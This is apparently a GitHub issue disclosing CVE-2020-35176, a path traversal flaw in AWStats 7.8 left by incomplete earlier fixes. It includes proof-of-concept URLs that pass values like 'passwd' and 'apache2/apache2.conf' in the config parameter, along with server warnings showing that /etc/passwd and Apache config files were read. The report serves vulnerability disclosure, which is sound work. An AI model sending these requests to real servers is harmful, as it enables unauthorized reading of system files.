Headline
CVE-2020-35176: CVE-2020-35176: path traversal flaw · Issue #195 · eldy/AWStats
In AWStats through 7.8, cgi-bin/awstats.pl?config= accepts a partial absolute pathname (omitting the initial /etc), even though it was intended to only read a file in the /etc/awstats/awstats.conf format. NOTE: this issue exists because of an incomplete fix for CVE-2017-1000501 and CVE-2020-29600.
Hi,
It seems #90 is not completely fixed in 7.8.
(that is, even after CVE-2017-1000501 and CVE-2020-29600 are fixed)
Altering slightly the original example:
http://myserver.example.com/cgi-bin/awstats.pl?config=/etc/passwd
to e.g.:
http://myserver.example.com/cgi-bin/awstats.pl?config=passwd
Warning: Syntax error line 1 in file '/etc/passwd'. Config line is ignored.
Warning: Syntax error line 2 in file '/etc/passwd'. Config line is ignored.
Warning: Syntax error line 3 in file '/etc/passwd'. Config line is ignored.
http://myserver.example.com/cgi-bin/awstats.pl?config=/passwd
Warning: Syntax error line 1 in file '/etc//passwd'. Config line is ignored.
Warning: Syntax error line 2 in file '/etc//passwd'. Config line is ignored.
Warning: Syntax error line 3 in file '/etc//passwd'. Config line is ignored.
http://myserver.example.com/cgi-bin/awstats.pl?config=apache2/apache2.org
Warning: Syntax error line 80 in file '/etc/apache2/apache2.conf'. Config line is ignored.
Warning: Syntax error line 87 in file '/etc/apache2/apache2.conf'. Config line is ignored.
Warning: Syntax error line 92 in file '/etc/apache2/apache2.conf'. Config line is ignored.
it is still parsing /etc/*.
I’d expect it to only allow files within /etc/awstats/awstats*.conf.
Like #90 this requires that /etc/awstats/awstats.conf does not exist (e.g. in multi-hosting environments with no default config).